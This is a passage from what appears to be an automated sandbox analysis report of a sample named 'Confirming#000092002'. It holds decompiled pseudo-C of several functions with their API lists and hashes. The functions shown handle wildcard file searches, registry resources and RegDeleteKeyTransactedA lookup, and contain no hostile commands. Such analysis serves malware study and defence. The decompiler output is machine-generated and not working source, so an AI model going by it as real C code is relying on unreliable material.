    									_t215 =  *_t264;
    									_t264 = _t264 + 1;
    									__eflags = _t215;
    								} while (_t215 != 0);
    								_t222 = _t222 + 1 + _t264 - _v20;
    								_t213 = _v12 + 4;
    								_t280 = _t280 + 1;
    								_v12 = _t213;
    								__eflags = _t280 - _t295;
    							} while (_t280 != _t295);
    							_t271 = _v16;
    							_v8 = _t222;
    							_t222 = 0;
    							__eflags = 0;
    						}
    						_t296 = E00EA7F8F(_t136, _t271, _v8, 1);
    						_t310 = _t309 + 0xc;
    						__eflags = _t296;
    						if(_t296 != 0) {
    							_v12 = _t283;
    							_t139 = _t296 + _v16 * 4;
    							_t233 = _t139;
    							_v28 = _t139;
    							_t140 = _t283;
    							_v16 = _t233;
    							__eflags = _t140 - _v40;
    							if(_t140 == _v40) {
    								L24:
    								_v12 = _t222;
    								 *_a8 = _t296;
    								_t297 = _t222;
    								goto L25;
    							} else {
    								_t274 = _t296 - _t283;
    								__eflags = _t274;
    								_v32 = _t274;
    								do {
    									_t150 =  *_t140;
    									_t275 = _t150;
    									_v24 = _t150;
    									_v20 = _t275 + 1;
    									do {
    										_t152 =  *_t275;
    										_t275 = _t275 + 1;
    										__eflags = _t152;
    									} while (_t152 != 0);
    									_t153 = _t275 - _v20 + 1;
    									_push(_t153);
    									_v20 = _t153;
    									_t157 = E00EACB84(_t233, _v28 - _t233 + _v8, _v24);
    									_t310 = _t310 + 0x10;
    									__eflags = _t157;
    									if(_t157 != 0) {
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										_push(_t222);
    										E00EA749C();
    										asm("int3");
    										_t306 = _t310;
    										_push(_t233);
    										_t239 = _v72;
    										_t65 = _t239 + 1; // 0x1
    										_t277 = _t65;
    										do {
    											_t159 =  *_t239;
    											_t239 = _t239 + 1;
    											__eflags = _t159;
    										} while (_t159 != 0);
    										_push(_t283);
    										_t285 = _a8;
    										_t241 = _t239 - _t277 + 1;
    										_v12 = _t241;
    										__eflags = _t241 -  !_t285;
    										if(_t241 <=  !_t285) {
    											_push(_t222);
    											_push(_t296);
    											_t68 = _t285 + 1; // 0x1
    											_t225 = _t68 + _t241;
    											_t300 = E00EA9E27(_t225, 1);
    											__eflags = _t285;
    											if(_t285 == 0) {
    												L40:
    												_push(_v12);
    												_t225 = _t225 - _t285;
    												_t164 = E00EACB84(_t300 + _t285, _t225, _v0);
    												_t311 = _t310 + 0x10;
    												__eflags = _t164;
    												if(_t164 != 0) {
    													goto L45;
    												} else {
    													_t229 = _a12;
    													_t206 = E00EAA626(_t229);
    													_v12 = _t206;
    													__eflags = _t206;
    													if(_t206 == 0) {
    														 *( *(_t229 + 4)) = _t300;
    														_t302 = 0;
    														_t77 = _t229 + 4;
    														 *_t77 =  *(_t229 + 4) + 4;
    														__eflags =  *_t77;
    													} else {
    														E00EA8B82(_t300);
    														_t302 = _v12;
    													}
    													E00EA8B82(0);
    													_t209 = _t302;
    													goto L37;
    												}
    											} else {
    												_push(_t285);
    												_t211 = E00EACB84(_t300, _t225, _a4);
    												_t311 = _t310 + 0x10;
    												__eflags = _t211;
    												if(_t211 != 0) {
    													L45:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E00EA749C();
    													asm("int3");
    													_push(_t306);
    													_t307 = _t311;
    													_t312 = _t311 - 0x298;
    													_t166 =  *0xeb9008; // 0x64e1d101
    													_v124 = _t166 ^ _t307;
    													_t244 = _v108;
    													_t278 = _v104;
    													_push(_t225);
    													_push(0);
    													_t287 = _v112;
    													_v724 = _t278;
    													__eflags = _t244 - _t287;
    													if(_t244 != _t287) {
    														while(1) {
    															_t204 =  *_t244;
    															__eflags = _t204 - 0x2f;
    															if(_t204 == 0x2f) {
    																break;
    															}
    															__eflags = _t204 - 0x5c;
    															if(_t204 != 0x5c) {
    																__eflags = _t204 - 0x3a;
    																if(_t204 != 0x3a) {
    																	_t244 = E00EAD0C0(_t287, _t244);
    																	__eflags = _t244 - _t287;
    																	if(_t244 != _t287) {
    																		continue;
    																	}
    																}
    															}
    															break;
    														}
    														_t278 = _v616;
    													}
    													_t168 =  *_t244;
    													_v609 = _t168;
    													__eflags = _t168 - 0x3a;
    													if(_t168 != 0x3a) {
    														L56:
    														_t226 = 0;
    														__eflags = _t168 - 0x2f;
    														if(__eflags == 0) {
    															L59:
    															_t169 = 1;
    														} else {
    															__eflags = _t168 - 0x5c;
    															if(__eflags == 0) {
    																goto L59;
    															} else {
    																__eflags = _t168 - 0x3a;
    																_t169 = 0;
    																if(__eflags == 0) {
    																	goto L59;
    																}
    															}
    														}
    														_v676 = _t226;
    														_v672 = _t226;
    														_push(_t300);
    														asm("sbb eax, eax");
    														_v668 = _t226;
    														_v664 = _t226;
    														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
    														_v660 = _t226;
    														_v656 = _t226;
    														_t175 = E00EAA01F(_t244 - _t287 + 1, _t287,  &_v676, E00EAA533(_t278, __eflags));
    														_t313 = _t312 + 0xc;
    														asm("sbb eax, eax");
    														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
    														_t301 = _t179;
    														__eflags = _t301 - 0xffffffff;
    														if(_t301 != 0xffffffff) {
    															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
    															__eflags = _t249;
    															_v648 = _t249 >> 2;
    															do {
    																_v640 = _t226;
    																_v636 = _t226;
    																_v632 = _t226;
    																_v628 = _t226;
    																_v624 = _t226;
    																_v620 = _t226;
    																_t185 = E00EA9F50( &(_v608.cFileName),  &_v640,  &_v609, E00EAA533(_t278, __eflags));
    																_t313 = _t313 + 0x10;
    																asm("sbb eax, eax");
    																_t188 =  !( ~_t185) & _v632;
    																__eflags =  *_t188 - 0x2e;
    																if( *_t188 != 0x2e) {
    																	L67:
    																	_push(_v616);
    																	_push(_v644);
    																	_push(_t287);
    																	_push(_t188);
    																	L33();
    																	_t313 = _t313 + 0x10;
    																	_v652 = _t188;
    																	__eflags = _t188;
    																	if(_t188 != 0) {
    																		__eflags = _v620 - _t226;
    																		if(_v620 != _t226) {
    																			E00EA8B82(_v632);
    																			_t188 = _v652;
    																		}
    																		_t226 = _t188;
    																	} else {
    																		goto L68;
    																	}
    																} else {
    																	_t255 =  *((intOrPtr*)(_t188 + 1));
    																	__eflags = _t255;
    																	if(_t255 == 0) {
    																		goto L68;
    																	} else {
    																		__eflags = _t255 - 0x2e;
    																		if(_t255 != 0x2e) {
    																			goto L67;
    																		} else {
    																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
    																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
    																				goto L68;
    																			} else {
    																				goto L67;
    																			}
    																		}
    																	}
    																}
    																L76:
    																FindClose(_t301);
    																goto L77;
    																L68:
    																__eflags = _v620 - _t226;
    																if(_v620 != _t226) {
    																	E00EA8B82(_v632);
    																}
    																__eflags = FindNextFileW(_t301,  &_v608);
    															} while (__eflags != 0);
    															_t196 = _v616;
    															_t257 = _v648;
    															_t278 =  *_t196;
    															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
    															__eflags = _t257 - _t199;
    															if(_t257 != _t199) {
    																E00EACB90(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00EA9E84);
    															}
    															goto L76;
    														} else {
    															_push(_v616);
    															_push(_t226);
    															_push(_t226);
    															_push(_t287);
    															L33();
    															_t226 = _t179;
    														}
    														L77:
    														__eflags = _v656;
    														_pop(_t300);
    														if(_v656 != 0) {
    															E00EA8B82(_v668);
    														}
    														_t190 = _t226;
    													} else {
    														_t190 = _t287 + 1;
    														__eflags = _t244 - _t287 + 1;
    														if(_t244 == _t287 + 1) {
    															_t168 = _v609;
    															goto L56;
    														} else {
    															_push(_t278);
    															_push(0);
    															_push(0);
    															_push(_t287);
    															L33();
    														}
    													}
    													_pop(_t288);
    													__eflags = _v16 ^ _t307;
    													_pop(_t227);
    													return E00EA403C(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
    												} else {
    													goto L40;
    												}
    											}
    										} else {
    											_t209 = 0xc;
    											L37:
    											return _t209;
    										}
    									} else {
    										goto L23;
    									}
    									goto L81;
    									L23:
    									_t212 = _v12;
    									_t263 = _v16;
    									 *((intOrPtr*)(_v32 + _t212)) = _t263;
    									_t140 = _t212 + 4;
    									_t233 = _t263 + _v20;
    									_v16 = _t233;
    									_v12 = _t140;
    									__eflags = _t140 - _v40;
    								} while (_t140 != _v40);
    								goto L24;
    							}
    						} else {
    							_t297 = _t296 | 0xffffffff;
    							_v12 = _t297;
    							L25:
    							E00EA8B82(_t222);
    							_pop(_t234);
    							goto L26;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t222;
    							_t217 = E00EAD080(_t132,  &_v8);
    							_t234 =  *_t292;
    							__eflags = _t217;
    							if(_t217 != 0) {
    								_push( &(_v608.cAlternateFileName));
    								_push(_t217);
    								_push(_t234);
    								L46();
    								_t309 = _t309 + 0xc;
    								_v12 = _t217;
    								_t297 = _t217;
    							} else {
    								_t218 =  &(_v608.cAlternateFileName);
    								_push(_t218);
    								_push(_t222);
    								_push(_t222);
    								_push(_t234);
    								L33();
    								_t297 = _t218;
    								_t309 = _t309 + 0x10;
    								_v12 = _t297;
    							}
    							__eflags = _t297;
    							if(_t297 != 0) {
    								break;
    							}
    							_t292 =  &(_a4[1]);
    							_a4 = _t292;
    							_t132 =  *_t292;
    							__eflags = _t132;
    							if(_t132 != 0) {
    								continue;
    							} else {
    								_t283 = _v608.cAlternateFileName;
    								_t232 = _v40;
    								goto L9;
    							}
    							goto L81;
    						}
    						_t283 = _v608.cAlternateFileName;
    						L26:
    						_t272 = _t283;
    						_v32 = _t272;
    						__eflags = _v40 - _t272;
    						asm("sbb ecx, ecx");
    						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
    						__eflags = _t236;
    						_v28 = _t236;
    						if(_t236 != 0) {
    							_t299 = _t236;
    							do {
    								E00EA8B82( *_t283);
    								_t222 = _t222 + 1;
    								_t283 = _t283 + 4;
    								__eflags = _t222 - _t299;
    							} while (_t222 != _t299);
    							_t283 = _v608.cAlternateFileName;
    							_t297 = _v12;
    						}
    						E00EA8B82(_t283);
    						goto L31;
    					}
    				} else {
    					_t219 = E00EA75D4(_t317);
    					_t297 = 0x16;
    					 *_t219 = _t297;
    					E00EA748C();
    					L31:
    					return _t297;
    				}
    				L81:
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
    • Instruction ID: 0e13b6450b9c8b8398f2d85681f5188c568627783404170661a8173f555d74be
    • Opcode Fuzzy Hash: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
    • Instruction Fuzzy Hash: C36118B5E00219AFCB14CFA8C8815EDBBF5AF5D314F28916AE855BB300D731AE41CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00EA2049(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t27;
    				void* _t28;
    				void* _t32;
    				void* _t33;
    				void* _t34;
    				void* _t36;
    				void* _t39;
    				void* _t44;
    				void* _t45;
    				intOrPtr* _t64;
    				void* _t65;
    				void* _t66;
    				void* _t68;
    				void* _t69;
    
    				_t62 = __edi;
    				_push(0x14);
    				E00EB0216(0xeb07c7, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t65 - 0x1c)) = __edx;
    				 *((intOrPtr*)(_t65 - 0x20)) = __ecx;
    				_t64 = 0;
    				 *((intOrPtr*)(_t65 - 0x18)) = 0;
    				 *(_t65 - 4) =  *(_t65 - 4) & 0;
    				_t43 =  *((intOrPtr*)(_t65 + 8));
    				if( *((intOrPtr*)(_t65 + 8)) == 0) {
    					_t44 = 0x80070057;
    				} else {
    					_t26 = E00EA75E7(_t43) + 1;
    					 *((intOrPtr*)(_t65 - 0x14)) = E00EA75E7(_t43) + 1;
    					_t27 = E00EA1181(_t65 - 0x14, _t26);
    					_t68 = _t66 + 4;
    					if(_t27 >= 0) {
    						_t62 =  *((intOrPtr*)(_t65 - 0x14));
    						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L6:
    							_t28 = E00EA3CD7(_t65 - 0x18, _t64, _t62);
    							_t64 =  *((intOrPtr*)(_t65 - 0x18));
    						} else {
    							_t39 = E00EA11AE(_t43, _t62, _t62, 0, __eflags);
    							__eflags = _t39;
    							if(_t39 == 0) {
    								goto L6;
    							} else {
    								E00EB02F0(_t62);
    								_t28 = _t68;
    							}
    						}
    						_t45 = E00EA1251(_t28, _t43, _t62, 3);
    					} else {
    						_t45 = 0;
    					}
    					_t31 = E00EA75E7(L"REGISTRY") + 1;
    					 *((intOrPtr*)(_t65 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
    					_t32 = E00EA1181(_t65 - 0x14, _t31);
    					_t69 = _t68 + 4;
    					if(_t32 >= 0) {
    						_t62 =  *((intOrPtr*)(_t65 - 0x14));
    						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L13:
    							_t33 = E00EA3CD7(_t65 - 0x18, _t64, _t62);
    							_t64 =  *((intOrPtr*)(_t65 - 0x18));
    						} else {
    							_t36 = E00EA11AE(_t45, _t62, _t62, _t64, __eflags);
    							__eflags = _t36;
    							if(_t36 == 0) {
    								goto L13;
    							} else {
    								E00EB02F0(_t62);
    								_t33 = _t69;
    							}
    						}
    						_t34 = E00EA1251(_t33, L"REGISTRY", _t62, 3);
    					} else {
    						_t34 = 0;
    					}
    					if(_t45 == 0) {
    						L18:
    						_t44 = 0x8007000e;
    					} else {
    						_t75 = _t34;
    						if(_t34 == 0) {
    							goto L18;
    						} else {
    							_t44 = E00EA1B39(_t45,  *((intOrPtr*)(_t65 - 0x20)), _t62, _t64, _t75,  *((intOrPtr*)(_t65 - 0x1c)), _t45, _t34, 0);
    						}
    					}
    				}
    				if(_t64 != 0) {
    					do {
    						_t62 =  *_t64;
    						_t64 = _t62;
    						E00EA7188(_t64);
    					} while (_t62 != 0);
    				}
    				return E00EB01C5(_t44, _t62, _t64);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA2050
    • __alloca_probe_16.LIBCMT ref: 00EA20A5
      • Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1
    • __alloca_probe_16.LIBCMT ref: 00EA2103
    Strings
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: 2f8fc02320a30a935efe5789a01dfe331b36eb3fbe9ed042fb3da536ca9ffd2e
    • Instruction ID: 3b2f207a6fd1e8d6c473294667902c8b3d026164229732f505bb2a67498519b3
    • Opcode Fuzzy Hash: 2f8fc02320a30a935efe5789a01dfe331b36eb3fbe9ed042fb3da536ca9ffd2e
    • Instruction Fuzzy Hash: 1631AA71F011155BDF10AAA8CC826FF72E65FAE714F14602DEB06BF252EA34BD018791
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00EA1E71(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t28;
    				void* _t29;
    				void* _t33;
    				void* _t35;
    				void* _t40;
    				void* _t44;
    				intOrPtr* _t46;
    				intOrPtr* _t64;
    				intOrPtr _t65;
    				intOrPtr* _t67;
    				void* _t68;
    				void* _t69;
    				void* _t71;
    				void* _t72;
    
    				_push(0x14);
    				E00EB0216(0xeb07c7, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t68 - 0x1c)) = __edx;
    				 *((intOrPtr*)(_t68 - 0x20)) = __ecx;
    				_t64 = 0;
    				_t67 = 0;
    				 *((intOrPtr*)(_t68 - 0x18)) = 0;
    				 *((intOrPtr*)(_t68 - 4)) = 0;
    				if( *((intOrPtr*)(_t68 + 8)) == 0) {
    					_t44 = 0x80070057;
    				} else {
    					_t27 = E00EA75E7( *((intOrPtr*)(_t68 + 8))) + 1;
    					 *((intOrPtr*)(_t68 - 0x14)) = E00EA75E7( *((intOrPtr*)(_t68 + 8))) + 1;
    					_t28 = E00EA1181(_t68 - 0x14, _t27);
    					_t71 = _t69 + 4;
    					if(_t28 >= 0) {
    						_t45 =  *((intOrPtr*)(_t68 - 0x14));
    						__eflags =  *((intOrPtr*)(_t68 - 0x14)) - 0x400;
    						if(__eflags > 0) {
    							L6:
    							_t29 = E00EA3CD7(_t68 - 0x18, _t67, _t45);
    							_t67 =  *((intOrPtr*)(_t68 - 0x18));
    						} else {
    							_t40 = E00EA11AE(_t45, _t45, 0, 0, __eflags);
    							__eflags = _t40;
    							if(_t40 == 0) {
    								goto L6;
    							} else {
    								E00EB02F0(_t45);
    								_t29 = _t71;
    							}
    						}
    						_t46 = E00EA1251(_t29,  *((intOrPtr*)(_t68 + 8)), _t45, 3);
    					} else {
    						_t46 = 0;
    					}
    					_t32 = E00EA75E7(L"REGISTRY") + 1;
    					 *((intOrPtr*)(_t68 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
    					_t33 = E00EA1181(_t68 - 0x14, _t32);
    					_t72 = _t71 + 4;
    					if(_t33 >= 0) {
    						_t65 =  *((intOrPtr*)(_t68 - 0x14));
    						_t77 = _t65 - 0x400;
    						if(_t65 > 0x400 || E00EA11AE(_t46, _t65, _t65, _t67, _t77) == 0) {
    							_t35 = E00EA3CD7(_t68 - 0x18, _t67, _t65);
    							_t67 =  *((intOrPtr*)(_t68 - 0x18));
    						} else {
    							E00EB02F0(_t65);
    							_t35 = _t72;
    						}
    						_t64 = E00EA1251(_t35, L"REGISTRY", _t65, 3);
    					}
    					if(_t46 == 0) {
    						L17:
    						_t44 = 0x8007000e;
    					} else {
    						_t80 = _t64;
    						if(_t64 == 0) {
    							goto L17;
    						} else {
    							_t44 = E00EA1B39(_t46,  *((intOrPtr*)(_t68 - 0x20)), _t64, _t67, _t80,  *((intOrPtr*)(_t68 - 0x1c)), _t46, _t64, 1);
    						}
    					}
    				}
    				if(_t67 != 0) {
    					do {
    						_t64 =  *_t67;
    						_t67 = _t64;
    						E00EA7188(_t67);
    					} while (_t64 != 0);
    				}
    				return E00EB01C5(_t44, _t64, _t67);
    			}

    APIs
    Strings
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: e580853d6a8a737f4302880e40aa6a02a8396767271fea174a1d8435eefda8fd
    • Instruction ID: 64019794cbf3bfe4a3b13366f516c99a87e6ee3e2284e0288d44e759500bfa57
    • Opcode Fuzzy Hash: e580853d6a8a737f4302880e40aa6a02a8396767271fea174a1d8435eefda8fd
    • Instruction Fuzzy Hash: 5A319435F002559BCB10EAA4CC82AFF72B5AF9E354F1460A5F906BF252EB74BD018791
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 18%
    			E00EA13BB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _t7;
    				_Unknown_base(*)()* _t8;
    				intOrPtr* _t12;
    
    				_t12 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegDeleteKeyA();
    				}
    				_t7 = GetModuleHandleA("Advapi32.dll");
    				if(_t7 == 0) {
    					goto L6;
    				}
    				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
    				if(_t8 == 0) {
    					goto L6;
    				}
    				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA13CD
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00EA13DD
    Strings
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyTransactedA
    • API String ID: 1646373207-1972538232
    • Opcode ID: 2b6e3ab523ad0ff5943ee38a6e0773f593f5254d3f27fa851445c977749687b3
    • Instruction ID: 522d9dc0da52e7e6fada555d1b10211dcbbf568dd27ad261d8f14e89b332a368
    • Opcode Fuzzy Hash: 2b6e3ab523ad0ff5943ee38a6e0773f593f5254d3f27fa851445c977749687b3
    • Instruction Fuzzy Hash: 03F08232210204BA97211FABAC08DA7B7ACEBCAB77B4590BEF591E5010D631A856C660
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA9F50(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t19;
    				intOrPtr _t29;
    				char _t31;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    
    				_t40 = _a4;
    				if(_t40 != 0) {
    					_t31 = 0;
    					__eflags =  *_t40;
    					if( *_t40 != 0) {
    						_t16 = E00EAB146(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t16;
    						if(__eflags != 0) {
    							_t38 = _a8;
    							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
    							if(__eflags <= 0) {
    								L11:
    								_t17 = E00EAB146(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
    								__eflags = _t17;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
    									_t19 = 0;
    									__eflags = 0;
    								} else {
    									E00EA759E(GetLastError());
    									_t19 =  *((intOrPtr*)(E00EA75D4(__eflags)));
    								}
    								L14:
    								return _t19;
    							}
    							_t19 = E00EAA58C(_t38, __eflags, _t16);
    							__eflags = _t19;
    							if(_t19 != 0) {
    								goto L14;
    							}
    							goto L11;
    						}
    						E00EA759E(GetLastError());
    						return  *((intOrPtr*)(E00EA75D4(__eflags)));
    					}
    					_t41 = _a8;
    					__eflags =  *((intOrPtr*)(_t41 + 0xc));
    					if(__eflags != 0) {
    						L6:
    						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
    						L2:
    						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
    						return 0;
    					}
    					_t29 = E00EAA58C(_t41, __eflags, 1);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						return _t29;
    					}
    					goto L6;
    				}
    				_t41 = _a8;
    				E00EAA572(_t41);
    				_t31 = 0;
    				 *((intOrPtr*)(_t41 + 8)) = 0;
    				 *((intOrPtr*)(_t41 + 0xc)) = 0;
    				goto L2;
    			}

    APIs
      • Part of subcall function 00EAA572: _free.LIBCMT ref: 00EAA580
      • Part of subcall function 00EAB146: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00EADE4D,0000FDE9,00000000,?,?,?,00EADBC6,0000FDE9,00000000,?), ref: 00EAB1F2
    • GetLastError.KERNEL32 ref: 00EA9FB8
    • __dosmaperr.LIBCMT ref: 00EA9FBF
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EA9FFE
    • __dosmaperr.LIBCMT ref: 00EAA005
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: c83ea07e6e8ba30b3d2366306056428c855c322a73485664d07c9f0da0c8e18a
    • Instruction ID: f0e5358f1ab4bb12f322bd7df314af73acb43f830d5d790fca1de4ada0105fed
    • Opcode Fuzzy Hash: c83ea07e6e8ba30b3d2366306056428c855c322a73485664d07c9f0da0c8e18a
    • Instruction Fuzzy Hash: D92181716043056FDB20AF618CC09AB77A8EF0E3687149629F869FF252D731FC409B61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00EA1A54(void* __ebx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
    				struct _CRITICAL_SECTION* _t22;
    				void* _t25;
    				void* _t28;
    				void* _t29;
    				void* _t49;
    				void* _t50;
    				void* _t52;
    
    				_t48 = __esi;
    				_t47 = __edi;
    				_push(0x10);
    				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
    				_t36 =  *((intOrPtr*)(_t49 + 0xc));
    				if( *((intOrPtr*)(_t49 + 0xc)) != 0 &&  *((intOrPtr*)(_t49 + 0x10)) != 0) {
    					_t22 =  *((intOrPtr*)(_t49 + 8)) + 0x10;
    					 *(_t49 - 0x1c) = _t22;
    					EnterCriticalSection(_t22);
    					_t48 = 0;
    					 *((intOrPtr*)(_t49 - 0x18)) = 0;
    					 *((intOrPtr*)(_t49 - 4)) = 0;
    					 *((intOrPtr*)(_t49 - 0x14)) = E00EA75E7(_t36) + 1;
    					_t25 = E00EA1181(_t49 - 0x14, E00EA75E7(_t36) + 1);
    					_t52 = _t50 + 4;
    					if(_t25 < 0) {
    						L9:
    						_t36 = 0x8007000e;
    					} else {
    						_t47 =  *((intOrPtr*)(_t49 - 0x14));
    						_t57 = _t47 - 0x400;
    						if(_t47 > 0x400 || E00EA11AE(_t36, _t47, _t47, 0, _t57) == 0) {
    							_t28 = E00EA3CD7(_t49 - 0x18, _t48, _t47);
    							_t48 =  *((intOrPtr*)(_t49 - 0x18));
    						} else {
    							E00EB02F0(_t47);
    							_t28 = _t52;
    						}
    						_t29 = E00EA1251(_t28, _t36, _t47, 3);
    						_t59 = _t29;
    						if(_t29 == 0) {
    							goto L9;
    						} else {
    							_push( *((intOrPtr*)(_t49 + 0x10)));
    							_push(_t29);
    							_t47 = E00EA175A(_t36,  *((intOrPtr*)(_t49 + 8)) + 4, _t47, _t48, _t59);
    							LeaveCriticalSection( *(_t49 - 0x1c));
    							_t36 =  !=  ? 0 : 0x8007000e;
    						}
    					}
    					if(_t48 != 0) {
    						do {
    							_t47 =  *_t48;
    							_t48 = _t47;
    							E00EA7188(_t48);
    						} while (_t47 != 0);
    					}
    				}
    				return E00EB01C5(_t36, _t47, _t48);
    			}











    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1A5B
    • EnterCriticalSection.KERNEL32(?,00000010,00EA362B,?,Module,?), ref: 00EA1A7F
    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,?), ref: 00EA1AF9
      • Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1
    • __alloca_probe_16.LIBCMT ref: 00EA1AC0
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CriticalSection__alloca_probe_16$EnterH_prolog3_Leave
    • String ID:
    • API String ID: 4018831387-0
    • Opcode ID: 5ab63f0654e5e7034a59bcd9072dcdd889077a053214b2b0e4e9c0a745017a12
    • Instruction ID: fa53296d9c8ca9523df9f7f764a251a3478f490e3df1a77537b20d63d898691d
    • Opcode Fuzzy Hash: 5ab63f0654e5e7034a59bcd9072dcdd889077a053214b2b0e4e9c0a745017a12
    • Instruction Fuzzy Hash: 3A21AF32B00205DBCB109FA8C8857EF76E5AF4E354F1560A9A915BF241EA34FD05CBA1
    Uniqueness

    Uniqueness Score: -1.00%

